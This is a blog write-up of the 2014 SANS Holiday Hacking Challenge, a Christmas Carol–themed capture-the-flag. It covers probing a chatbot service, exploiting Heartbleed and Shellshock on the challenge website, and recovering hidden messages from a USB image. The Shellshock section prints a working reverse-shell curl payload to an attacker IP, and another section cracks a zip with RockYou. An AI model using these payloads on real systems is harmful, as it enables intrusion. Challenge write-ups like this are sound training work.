2014 SANS Holiday Hacking Challenge

So,

Right before the holiday, I get wind of the SANS Institute Christmas hacking competition.  This was no small feat but through collaboration with some of my @MIsec, @SecureKomodo (Check him out at http://securekomodo.com), and other folks, we were able to hack ’till our hearts content.  Below, you will find my officially submitted write-up for reference…very fun stuff!

The Initial Investigation

When this mission was presented to me, I assumed that it was in jest after learning of the prize at stake. Any guardian of information technology will tell you that an opportunity to learn with the SANS Institute is an amazing opportunity indeed!

The setup was simple…Ebenezer Scrooge had become arrogant in his old age and had decided that hacking for humanity was a lost cause. As the story goes, this old codger was visited by three mysterious apparitions after first being visited by the spirit of his fallen comrade, Marley. All of these terrors served one purpose, to steer Scrooge from his evil ways and back to the path of righteousness. Similar to the three wise men mentioned in other tales of yore, each one of these spirits possessed a gift albeit the joyous nature of these gifts were not directly apparent at the time received.

The Ghost of Christmas Past

ghost1

Mission Brief

The Ghost of Christmas Past was none other than Dr. Alan Turning himself. This father of information science visited Mr. Scrooge first, to offer a fond memory of happier times gone by. Showing Scrooge how he was one an advocate of hacking for good and attempting to remind him that his outlook was not always as bleak as it is now. In parting, Mr. Turing left an invitation for Ebenezer to meet with one of his own acquaintances who would provide Scrooge with both companionship and sensitive information. The mission is to investigate the information that Dr. Turing provided and recover said intelligence.

Gathered Intelligence

Full Domain Name: li243-59.members.linode.com
Operating System: Linux (Unknown Kernel)
IPv4 Address: 173.255.233.59
Services/Ports:

Port Service Status Notes
22 SSH (Secure Shell) Open OpenSSH 6.0p1 Debian 4+deb7u2
25 SMTP Filtered
113 Ident Filtered
135 MSRPC Filtered
139 Netbios-SSN Filtered
445 MS-DS Filtered
31124 Unknown Open

 

Tools Used
  • Putty (SSH/Telnet Client)
  • TeraTerm (SSH/Telnet Client)
  • nMap (Port Scanner)
  • Wireshark (Packet Analyzer)
  • Apache Web Server
Summary of Findings

When I began my investigation of this mysterious “friend”, I will admit that I was baited by the apparent SSH utilization. It wasn’t until I had exhausted my efforts searching for a private key, that I had realized port 31124 had been open right under my nose.

It was then that I first found Eliza, an artificial intelligence which had undergone Dr. Turing’s “Turing Test” and actually passed after successfully exhibiting natural speaking patterns and cognizant behavior resembling human thought. Accessed through a Telnet session, I was immediately greeted by the A.I. as it introduced itself by name. Immediately, I asked about the “secret” and my inquiry was met with humor as she explained that “A girl has to have her secrets.” Remembering the advice of Dr. Turing to Scrooge, I asked about surfing the web together and Eliza again responded with a joke. This carried on for a while as I attempted to feel out the language barriers and acceptable syntax. The final model of the conversation went as follows…

Eliza: “I AM ELIZA. WHAT’S ON YOUR MIND?”
Me: “Hello, how are you?”
Eliza: “How do you do. Please state your problem”
Me: “I am looking for your secret”
Eliza: “A girl’s gotta keep her secrets. Why don’t you ask me about something else?”
Me: “I really need your secret”
Eliza: “You really are interested in my secret. I think we should get to know each other better first. Tell   me about your favorite websites.”
Me: “Listen, I just need to know your secret.”
Eliza: “I am so sorry, but I can’t tell you my secret via this dialog. I do really like you, but I worry that someone may be shoulder surfing you. No one is shoulder surfing me, though, so why don’t you give me a URL that I can surf to?”
Me: “Browse http://www.google.com”
Eliza: “Does this look like the correct page? GOOGLE”

At this point, I was stumped. During this conversation, I had been utilizing Wireshark to capture our conversation and had not found anything profound yet. I then told this A.I. to navigate to one of my own websites (http://www.netlocksystems.com). After returning the same sort of response to my new query, I logged into my own webserver and started looking through my connection and authentication logs to see if Eliza had made any sort of footprint. To my surprise, I found the following entry in my connection log.

Secret Revealed

173.255.233.59
[29/Dec/2014:00:10:09 -0500]
“GET / HTTP/1.1” 200 10837 “-”
“Mozilla/5.0 (Bombe; Rotors:36)
Eliza Secret: \”Machines take me by surprise with great frequency. -Alan Turing\””

The Ghost of Christmas Present

 

ghost2

Mission Brief

The second spirit to visit Scrooge was none other than Johnny Long, famed Google hacker and philanthropist. After a lengthy vision of Tiny Tom and Mrs. Cratchit discussing his charitable contributions to the Shelter for Impossibly Cute Orphaned Puppies, the spirit reveals to Scrooge that hacking can be used for good. Mr. Long also reveals that he has embedded two “special secrets” within Scrooge’s very own website, Scrooge-and-Marley.com.

 

Gathered Intelligence

URL: http(s)://www.scrooge-and-marley.com

IP Address: 23.239.15.124

Operating System: Linux (Unknown Distribution)

Site Contents: index.html, contact.html, cgi-bin/submit.sh, various images

 

There is a key statement made by the spirit which quickly led me to an appropriate path of research. Shortly before leaving Mr. Scrooge, the ghost states “Those secrets should shock your heart, teaching you important lessons for all time.” The keywords here are of course “Shock” and “Heart”. Shellshock, the widespread Bash vulnerability and HeartBleed, the SSL vulnerability, both of which had been in the news recently.

My first order of business was to research these vulnerabilities and dig deeper into the parameters surrounding them. Digging deeper into ShellShock, I was able to better understand how the USERAGENT can be changed to include an executable line of code.

 

Tools Used

  • NetCat
  • Curl

 

Summary of Findings

 

HeartBleed (Secret #1)

  1. First, I verified that this website/webserver was susceptible to the HeartBleed vulnerability. This was done using the Qualys SSL LABS toolkit. Qualys quickly returned that this site was vulnerable to HeartBleed, Poodle, and the OpenSSL CCS vulnerability (CVE-2014-0224), among other things.
  2. Once the vulnerability was established, I began to research exploit techniques for HeartBleed and found Metasploit to be the most effective method.
  3. Using the HeartBleed module (auxiliary/scanner/ssl/openssl_heartbleed), I was able to successfully pass this exploit and return a bin file which contained the leaked memory strings from the web server. Exploring the hex data of the bin file with FileAlyzer, I was able to obtain the following plain text message as well as the first website secret.

 

 

For in the very air through which this Spirit moved it seemed to scatter gloom and mystery.

It was shrouded in a deep black garment which concealed its head its face its form and left nothing of it visible save one outstretched hand.

But for this it would have been difficult to detach its figure from the night and separate it from the darkness by which it was surrounded.”

 

Website Secret 1=Hacking can be noble

 

ShellShock (Secret #2)

This was a little different. Part of my preliminary investigation of the website included a full site download using Black Widow© from Softbyte Labs. This download revealed an Index page, a Contact page and a corresponding .sh script within the CGI-Bin folder. This script would normally be used to carry out the form functions of the contact page. As all of the appropriate parameters seemed to be in place, I began working with this exploit.

Tools Required

  • NetCat
  • Curl

 

  1. For this exploit, I utilized a reverse, UNIX shell which required me to first segregate my Kali VM into a DMZ and then enable port forwarding. For verification, I started the Apache service within Kali and verified my landing page by IP.
  2. Next, I started a NetCat listener with the command, “ncat -l -v 4444”
  3. Opening a second terminal, I then executed the following command to call a reverse shell using my public IP address…”curl -H ‘x: () { :;}; /bin/bash -i >& /dev/tcp/MYPUBLICIPADDRESS/4444 0>&1’ http://23.239.15.124/cgi-bin/submit.sh”
  4. Almost immediately, my ncat window responded and I was able to successfully push commands to this remote server. I was not out of the woods yet, however. Although the terminal states “bash-4.2”, nearly all of my familiar bash commands were gone. Using $SHELL, I was able to see that my shell was /bin/sh and not /bin/bash. I then began to research things like Unix BuiltIn shell commands and came to the realization that this was sort of a Korn/Posix mix. I was able to use “printf “%s\n” *” in place of “LS” so I could begin to map the file structure, although I was not entirely sure what I was looking for. By some stroke of luck, I decided to start at the very beginning and work my way forward.
  5. Target-Found! – Using the following commands, I was able to locate the Secret but I was not yet sure how to use it. With no copy, cat, or rename options, I was afraid this case had bested me.   A little more research and practice within the command line and I was able to pass the contents of the “Secret” file into echo and cough it back as stdout.

 

 

cd /
print f ”%s\n” *
echo “$(<secret)”

The finished product can be seen below as the secret was revealed to me as the others before it.

 

website2

Secrets Revealed

 

Website Secret #2: Use your skills for good.

 

While other vulnerabilities were present in the website, the Spirit had only indicated that two secrets had been hidden. These secrets have since been recovered and archived.

Website Secret #1: Hacking can be noble

 

Website Secret #2: Use your skills for good.

 

 

The Ghost of Christmas Future

ghost3

Mission Brief

 

In Scrooge’s third and final revelation, he is given data on an external USB drive which shows him evidence of things to come with obviously startled him. Without uttering a word, this Spirit rocked Scrooge to his very core with the dark and mysterious secrets entwined in this small disk partition.

 

 

Gathered Intelligence

While this final task was not the most technically tasking, it may have required the most brain power. Within this flash drive, there were four different secrets hidden within its contents. When I first dredged through the contents of this drive, the first thing that caught my attention was a password protected zip file. In retrospect, the work that I put into cracking the zip file was in vain as I did discover the password elsewhere in plaintext but that is a story for a different time.

Tools Used

  • FileAlyzer
  • 7Zip
  • WireShark
  • F5 Steganography
  • Fcrackzip
  • EXIF Data Extractor
  • Misc…

The initial contents of the .bin file included the following…

àhhusb.bin

|- $Extend
->|- $RmMetadata
->->|- $Txf
->->|- $TxfLog
->->->|- $Tops
->->->|- $Tops:$T
->->|- $Repair
->->|- $Repair:$Config
|- [DELETED]
->|- Tiny_Tom_Crutches_Final.jpg
|- [SYSTEM]
->|- $Extend
->|- .
->|- $MFT
->|- $MFTMirr
->|- $LogFile
->|- $Volume
->|- $AttrDef
->|- $Bitmap
->|- $Boot
->|- $BadClus
->|- $Secure:$SDS
->|- $UpCase
|- hh2014-chat.pcapng
|- hh2014-chat.pcapng:Bed_Curtains.zip
->|- Bed_Curtains.png
|- LetterFromJackToChuck.doc

 

Summary of Findings

While these secrets were not discovered in order, they will be presented that way for the purpose of consistency. This first secret was discovered rather quickly. In the “LetterFromJackToChuck.doc” file, we are presented with a standard Microsoft Word document with two separate embedded graphics. This is a letter from Jonathan Pease to Charles Booth and serves two purposes. Jonathan is writing, not only to wish Charles a happy Holiday filled with love and merriment but also to reveal the fact that Scrooge has died. The undertone is one of relief and celebration at the fact that Ebenezer is dead. First, the graphics were extracted from this document for a quick steganography/hidden data check which revealed nothing unusual. The letter itself was a different story. While viewing the hex data of the document file using the FileAlyzer tool, I was able to see a plain text message which is shown below…

snap1

 

snap2

 

In the image above, the secret is revealed as:

 

USB Secret #1: Your demise is a source of mirth

 

                The second secret was actually discovered while examining the Packet Capture file. While reconstructing the conversation shown below, I also discovered two packets that contained comment information. The comment relative to this secret was a Base 64 string. After translating this string with Powershell, I discovered the second secret.

 

$data=’VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg==’

[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($data))

 

USB Secret #2: Your demise is a source of relief.

 

                The third secret was a little different in that there were multiple tasks to accomplish. During my initial forensic analysis, I discovered a password encrypted zip file. After finding the wealth of information in the hex/metadata of the other images found here, I was sure that this archive had untold secrets also. Using an archive utility found within Kali Linux, called fcrackzip, I was able to compromise the file and extract the information contained within.

Fcrackzip

  1. First, I located and prepared the RockYou word list found in /usr/share/WordLists.
  2. In a terminal window, execute

fcrackzip -v -D -u -p rockyou.txt hh2014-chat.pcapng

  1. The password was revealed in less than 30 seconds as shown in the following illustration.
  2. Once the zip file was opened and the contents extracted, there was found a .png image depicting divvying of Scrooge’s possessions after his death.

 

fcrack

                *Bruteforce cracking of the archive file

  1. Once again, FileAlyzer allowed a quick view of the hexdata from this Bed_Curtains image which revealed secret 3….

 

“USB Secret #3 “Your demise is a source of gain for others”

 

 

For the fourth and final secret, I must admit that I had gone in circles here and for good reason. Prior to discovering the commented packets contained within the capture file, a quick inspection of the Tiny Tom crutches photo revealed both, strange looking pixels within the image, especially over the text on the stow tags, and a strange copyright within the hex, which read “JPEG Encoder Copyright 1998, James R. Weeks and BioElectroMech”.

crutches

Some Googling and one comes to understand that this tool is very old and discontinued, and a surprisingly small set of information is available about its use. Several Exif and steganography tools later, I thought that this final secret was going to be a pivotal moment and either make or break my case. While gathering data for the other secrets, I decided to take one final look at the capture file and the conversation contained within to be sure I hadn’t missed some crucial piece of evidence. For clarity, I’m including the conversation here in my research…

 

2a368e544111c18030856a46320200e68ad8a263: @Caroline Smith username: csmith
d5c1bc63db3b1c59cc312503433470270e146e24: @Samuel Smith username: ssmith
2a368e544111c18030856a46320200e68ad8a263: “My Darling Husband, I do so appreciate your checking with Mr. Scrooge about the status of our debts. If he would grant us just one more month, we may be able scrape together enough to meet him minimum payment and stay out of debtor’s prison. Please tell me of your progress, my love.”
d5c1bc63db3b1c59cc312503433470270e146e24: “As promised, I have indeed reached out to Mr. Scrooge to discuss our financial affairs with him, dear.”
2a368e544111c18030856a46320200e68ad8a263: “Is it good… or bad?”
d5c1bc63db3b1c59cc312503433470270e146e24: “Bad”
2a368e544111c18030856a46320200e68ad8a263: “We are quite ruined”
d5c1bc63db3b1c59cc312503433470270e146e24: “No. There is hope yet, Caroline”
2a368e544111c18030856a46320200e68ad8a263: “If he relents, there is. Nothing is past hope, if such a miracle has happened.”
d5c1bc63db3b1c59cc312503433470270e146e24: “He is past relenting. He is dead.”
2a368e544111c18030856a46320200e68ad8a263: “That is wondrous news! To whom will our debt be transferred?
d5c1bc63db3b1c59cc312503433470270e146e24: “I don’t know. But before that time we shall be ready with the money. And even if we are not, it would be a bad fortune indeed to find so merciless a creditor in his successor. We may sleep tonight with light hearts, Caroline!”
2a368e544111c18030856a46320200e68ad8a263: “I’ve just told our children about Mr. Scrooge’s death, and all of their faces are brighter for it. We now have a very happy house. I so love you.”
d5c1bc63db3b1c59cc312503433470270e146e24: “I shall see you soon, my dear. Lovingly — Samuel.”

 

This conversation was all presented in clear text within several TCP packets as a disclosure was made in regards to Scrooge being dead. A relieved husband and wife, Samuel and Caroline Smith express their thankfulness in the tyrant’s end. After going through this once again, I realized that I had simply been following the TCP stream to retrieve this conversation but hadn’t given much attention to at least the packets within this exchange. A closer inspection revealed two comments, once of which had been mentioned in previous research. The second comment, which is extremely important here, refers to a Google Code repository where a tool called f5 Stegonography has been developed.

 

wshark1

 

As I’m sure the suspense is killing you as the reader, it goes without saying that I had stumbled upon the Holy Grail. After researching this tool and its capabilities, it became shockingly apparent that this was my key to salvation. Using the command string shown below, I was able to recover the final secret.

stego1

 

*Extracting embedded text from the JPG image using the F5 algorithm

Decoded Text:

“Tiny Tom has died.

USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.”

 

Secrets Revealed

A brief recap of the information found on the USB drive given to Scrooge by the Ghost of Christmas future reveals a time in which Scrooge is no more and instead of tears of sympathy, every tear is brimming with joy at the news of his passing.
 
USB Secret #1: Your demise is a source of mirth
 
USB Secret #2: Your demise is a source of relief.
 
USB Secret #3: Your demise is a source of gain for others
 
USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.
 
 
 

Secrets Index

 

Eliza Secret: \”Machines take me by surprise with great frequency. -Alan Turing\””
 
Website Secret #1: Hacking can be noble.
 
Website Secret #2: Use your skills for good.
 
USB Secret #1: Your demise is a source of mirth.
 
USB Secret #2: Your demise is a source of relief.
 
USB Secret #3: Your demise is a source of gain for others.
 
USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Powered by WordPress.com.

Up ↑